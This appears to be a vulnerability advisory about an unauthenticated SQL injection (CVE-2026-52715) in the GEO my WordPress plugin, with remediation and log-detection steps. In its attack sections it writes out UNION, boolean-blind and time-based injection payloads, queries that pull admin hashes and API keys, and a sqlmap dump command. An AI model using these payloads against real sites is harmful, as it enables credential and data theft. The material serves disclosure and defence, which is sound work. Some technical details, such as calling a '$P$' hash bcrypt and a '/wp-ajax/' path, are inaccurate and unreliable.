CVE-2026-52715: GEO my WordPress Unauthenticated SQL Injection
A critical unauthenticated SQL injection vulnerability has been disclosed in GEO my WordPress, a plugin that enables geolocation-based content customization on WordPress sites. Tracked as CVE-2026-52715 with a CVSS score of 9.3 (Critical), the flaw permits any unauthenticated attacker to extract data from the WordPress database by manipulating HTTP request parameters.
All versions of the plugin up to and including 4.5.5 are affected. The vulnerability is classified under CWE-89 (Improper Neutralization of Special Elements used in an SQL Command).
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-52715 |
| CVSS Score | 9.3 (Critical) |
| CWE Classification | CWE-89 — SQL Injection |
| Attack Type | Unauthenticated SQL Injection |
| Affected Plugin | GEO my WordPress |
| Affected Versions | <= 4.5.5 |
| Authentication Required | None |
| Patch Available | Update to version after 4.5.5 |
About GEO my WordPress
GEO my WordPress is a geolocation plugin that enables WordPress sites to serve location-aware content based on visitor IP address or user-provided location data. Common use cases include:
- Displaying localized pricing, currency, or language content
- Restricting or customizing content based on country or region
- Integrating with mapping services to show nearby locations
- Powering store locators and location-based search features
The plugin is used by e-commerce sites, franchise businesses, directories, and any WordPress operator that needs geographically targeted content delivery. Its integration with site-wide content queries makes the SQL injection flaw particularly dangerous — the vulnerable code path is likely triggered by ordinary site functionality.
Technical Background
SQL injection occurs when user-supplied data is incorporated into a database query without proper escaping or parameterization. In the case of GEO my WordPress, location-related parameters (country codes, coordinates, postal codes, or other geo identifiers) appear to be passed into MySQL queries without adequate sanitization.
A standard unauthenticated SQL injection attack against this type of plugin might look like:
# URL-encoded attack targeting a geo query parameter
GET /wp-json/geo-my-wp/v1/search?geo_query=1%20UNION%20SELECT%20user_login,user_pass,user_email,4,5,6%20FROM%20wp_users-- HTTP/1.1
# Boolean-based blind extraction
GET /wp-ajax/?action=gmw_search&address=1'+AND+1=1-- HTTP/1.1 (true - normal response)
GET /wp-ajax/?action=gmw_search&address=1'+AND+1=2-- HTTP/1.1 (false - altered response)
# Time-based blind extraction
GET /wp-ajax/?action=gmw_search&lat=1+AND+SLEEP(5)-- HTTP/1.1
The absence of any authentication requirement means this attack is fully automatable using tools such as sqlmap:
# Automated exploitation example (authorized testing only)
sqlmap -u "https://target.example.com/wp-ajax/?action=gmw_search&address=1" \
--dbms=mysql --dump --tables -p addressAttack Scenarios
Credential Exfiltration
The most immediate risk is extraction of WordPress administrator credentials:
-- Extract admin username and password hash
SELECT user_login, user_pass FROM wp_users WHERE ID=1
-- Result example:
-- admin | $P$BxxxxxxxxxxxxxxxxxxxxxxxxxxX (bcrypt hash)Extracted bcrypt hashes can be subjected to offline dictionary attacks using tools like Hashcat or John the Ripper. If the administrator uses a weak or commonly used password, this can lead to account compromise within minutes.
Data Theft via UNION-based Injection
If the injection point returns reflected data (non-blind), attackers can use UNION SELECT to extract any table:
-- Extract all WordPress users
' UNION SELECT user_login, user_email, user_pass, 4 FROM wp_users--
-- Extract stored API keys from wp_options
' UNION SELECT option_name, option_value, 3, 4 FROM wp_options
WHERE option_name LIKE '%api_key%'--
-- Extract RD Station, WooCommerce, or other plugin configurations
' UNION SELECT option_name, option_value, 3, 4 FROM wp_options
WHERE option_name LIKE '%secret%' OR option_name LIKE '%token%'--Location Data Exposure
GEO my WordPress may also store visitor geolocation records. Depending on the plugin's configuration, this could expose:
- Visitor IP addresses correlated with location
- User-submitted addresses or coordinates
- Business location data entered by site administrators
Scope and Prevalence
The GEO my WordPress plugin serves a niche but established segment of the WordPress ecosystem. Sites running the plugin tend to be:
- E-commerce stores serving multiple geographic markets
- Franchise and multi-location businesses with location-aware content needs
- Directories and local search platforms built on WordPress
The CVSS 9.3 rating reflects the combination of unauthenticated access and the high potential for critical data exfiltration, including administrator credentials that can enable full site takeover.
Remediation
Update the Plugin
Upgrade GEO my WordPress to a version after 4.5.5:
# Via WP-CLI
wp plugin update geo-my-wp
# Verify installed version
wp plugin get geo-my-wp --field=versionOr update via WordPress Admin > Plugins > GEO my WordPress > Update Now.
Interim Mitigations
- Temporarily deactivate the plugin if it is not essential to core business operations
- Deploy a Web Application Firewall (WAF) with SQL injection signature rules:
- Wordfence (free tier includes basic SQLi protection)
- Cloudflare WAF (managed rulesets block common SQLi patterns)
- Sucuri Website Firewall
- Restrict access to vulnerable endpoints via IP allowlisting if the geo features are used only internally
- Enable WordPress salted hashing — ensure WordPress secret keys in
wp-config.phpare unique to limit the value of any extracted password hashes
Database Hardening
Limit the WordPress database user's privileges to reduce the impact of any SQL injection:
-- Grant minimum required privileges only
GRANT SELECT, INSERT, UPDATE, DELETE ON wordpress_db.* TO 'wp_user'@'localhost';
-- Revoke dangerous privileges if granted
REVOKE FILE, SUPER, EXECUTE, CREATE, DROP ON wordpress_db.* FROM 'wp_user'@'localhost';
FLUSH PRIVILEGES;Detection
Monitor web server logs and database activity for signs of exploitation:
# Scan access logs for SQL injection patterns
grep -iE "(UNION.{0,30}SELECT|SLEEP\(|BENCHMARK\(|INFORMATION_SCHEMA|0x[0-9a-f]{6,})" \
/var/log/nginx/access.log | grep -i "gmw\|geo.my.wp\|geo_query\|address=" | tail -100
# Look for anomalous response time (time-based SQLi)
awk '$NF > 5000 {print $0}' /var/log/nginx/access.log | grep "gmw\|geo" | tail -50
# Enable MySQL slow query log to catch SLEEP() calls
SET GLOBAL slow_query_log = 'ON';
SET GLOBAL long_query_time = 3;
SET GLOBAL slow_query_log_file = '/var/log/mysql/slow.log';Impact Assessment
| Impact Area | Severity | Description |
|---|---|---|
| Credential Theft | Critical | Admin password hashes extractable without authentication |
| Full Site Takeover | Critical | Cracked credentials enable WordPress admin login |
| Customer Data | High | PII from WooCommerce orders, user registrations, or CRM data |
| API Key Exposure | High | Third-party integration keys stored in wp_options at risk |
| Location Data | Medium | Visitor geolocation records may be exposed |
| Exploitation Complexity | Very Low | Automatable with standard tools (sqlmap, Burp Suite) |
Key Takeaways
- CVE-2026-52715 is a critical unauthenticated SQL injection in GEO my WordPress
<= 4.5.5 - CVSS 9.3 Critical — no authentication required, full database access possible
- Automatable exploitation — standard sqlmap tooling can extract credentials without special skill
- Admin credential risk — WordPress admin password hashes are directly extractable
- Immediate action: Update the plugin; deploy WAF rules; audit wp_options for exposed API keys if running an affected version